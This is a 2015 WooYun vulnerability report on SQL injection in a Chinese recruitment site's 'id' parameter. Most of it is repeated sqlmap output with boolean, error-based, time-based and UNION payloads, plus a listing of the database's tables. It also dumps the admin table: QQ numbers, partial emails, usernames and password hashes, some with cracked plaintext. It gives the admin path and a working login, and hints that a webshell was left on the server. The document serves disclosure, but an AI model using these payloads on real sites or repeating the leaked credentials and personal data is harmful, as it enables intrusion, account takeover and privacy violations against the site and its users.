当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136001

漏洞标题:某人才招聘存在SQL注入导致大量简历企业资料泄露可shell

相关厂商:众信人才中介服务有限公司

漏洞作者: me1ody

提交时间:2015-08-25 21:49

修复时间:2015-10-11 09:08

公开时间:2015-10-11 09:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-27: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-06: 细节向核心白帽子及相关领域专家公开
2015-09-16: 细节向普通白帽子公开
2015-09-26: 细节向实习白帽子公开
2015-10-11: 细节向公众公开

简要描述:

12w简历
2w多的企业资料
影响站点20多个
sql注入
getshell

详细说明:

注入点

http://**.**.**.**/detail.php?id=62970


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=62970' AND 8205=8205 AND 'xqPF'='xqPF
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=62970' AND (SELECT 4151 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4151=4151,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sjxy'='sjxy
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=62970' AND (SELECT * FROM (SELECT(SLEEP(60)))JgaB) AND 'MDxp'='MDxp
    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: id=-7173' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x78754c674e4669727650,0x716a716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [7]:
[*] cacti
[*] information_schema
[*] mysql
[*] rencai_2012
[*] rencai_2014
[*] rencai_201407
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=62970' AND 8205=8205 AND 'xqPF'='xqPF
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=62970' AND (SELECT 4151 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4151=4151,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sjxy'='sjxy
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=62970' AND (SELECT * FROM (SELECT(SLEEP(60)))JgaB) AND 'MDxp'='MDxp
    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: id=-7173' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x78754c674e4669727650,0x716a716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current database:    'rencai_2012'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=62970' AND 8205=8205 AND 'xqPF'='xqPF
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=62970' AND (SELECT 4151 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4151=4151,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sjxy'='sjxy
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=62970' AND (SELECT * FROM (SELECT(SLEEP(60)))JgaB) AND 'MDxp'='MDxp
    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: id=-7173' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x78754c674e4669727650,0x716a716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: rencai_2012
[60 tables]
+----------------------+
| ins_ad               |
| ins_adboard          |
| ins_admin            |
| ins_admin_role       |
| ins_admin_role_priv  |
| ins_article          |
| ins_article_cate     |
| ins_attatch          |
| ins_company          |
| ins_company_cate     |
| ins_company_comments |
| ins_company_contact  |
| ins_company_diytpl   |
| ins_company_favs     |
| ins_company_info     |
| ins_company_invite   |
| ins_company_sites    |
| ins_company_top      |
| ins_company_upgrade  |
| ins_company_vip      |
| ins_company_window   |
| ins_content_cate     |
| ins_flink            |
| ins_flink_cate       |
| ins_gonggao          |
| ins_headhunter       |
| ins_help             |
| ins_hh_config        |
| ins_hh_content       |
| ins_hh_content_cate  |
| ins_hh_cooperation   |
| ins_hh_news          |
| ins_hh_news_cate     |
| ins_hh_online_order  |
| ins_hh_partners      |
| ins_jobs             |
| ins_jobs_cate        |
| ins_jobs_complaint   |
| ins_jobs_contact     |
| ins_jobs_info        |
| ins_mail_queue       |
| ins_menu             |
| ins_mess             |
| ins_nav              |
| ins_sendresume       |
| ins_session          |
| ins_setting          |
| ins_site_content     |
| ins_sites            |
| ins_sms_queue        |
| ins_users            |
| ins_users_black      |
| ins_users_cate       |
| ins_users_catepar    |
| ins_users_favs       |
| ins_users_sites      |
| ins_viewresume       |
| ins_weixin           |
| ins_work_position    |
| ins_worker           |
+----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=62970' AND 8205=8205 AND 'xqPF'='xqPF
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=62970' AND (SELECT 4151 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4151=4151,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sjxy'='sjxy
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=62970' AND (SELECT * FROM (SELECT(SLEEP(60)))JgaB) AND 'MDxp'='MDxp
    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: id=-7173' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x78754c674e4669727650,0x716a716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: rencai_2012
Table: ins_admin
[6 entries]
+----+---------+---------+---------------+---------------------+-----------+-------------+----------+-------------------------------------------+
| id | role_id | site_id | qq            | email               | lastip    | username    | lasttime | password                                  |
+----+---------+---------+---------------+---------------------+-----------+-------------+----------+-------------------------------------------+
| 1  | 2       | 0       | 951636692(鐜嬪康) | 951636692@**.**.**.**    | **.**.**.** | kfwn        | 2009     | 13e311484e63b35e06c0a3718787d609(67939030)          |
| 2  | 2       | 0       | 1525950257    | 1525950257@**.**.**.**   | **.**.**.** | kfaz        | 2009     | 13e311484e63b35e06c0a3718787d609          |
| 3  | 8       | 0       | <blank>       | wang1978223@**.**.**.** | **.**.**.** | wn          | 2009     | e5cf362e3b023b7141c9dd8575b14272 (008800) |
| 4  | 2       | 0       | 2577402148    | 2577402148@**.**.**.**   | **.**.**.** | kfdk        | 2010     | d41d8cd98f00b204e9800998ecf8427e ()       |
| 5  | 2       | 0       | 1269122938    | 1269122938@**.**.**.**   | **.**.**.** | chenchunhua | 2010     | b51e8dbebd4ba8a8f342190a4b9f08d7 (456456) |
| 6  | 7       | 0       | <blank>       | <blank>             | **.**.**.** | wurentupian | 2010     | bc498a180d802e984493259367c9e10b          |
+----+---------+---------+---------------+---------------------+-----------+-------------+----------+-------------------------------------------+


解密在http://**.**.**.**
后台地址

http://**.**.**.**/admin.php


账户密码

wn 008800


1.png


2.png


3.png


5.png


4.png


其他不多说了都懂 一句话自行删除谢谢

漏洞证明:

1.png


2.png


3.png


5.png


4.png

修复方案:

其他不多说了都懂 一句话自行删除谢谢

版权声明:转载请注明来源 me1ody@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-27 09:07

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无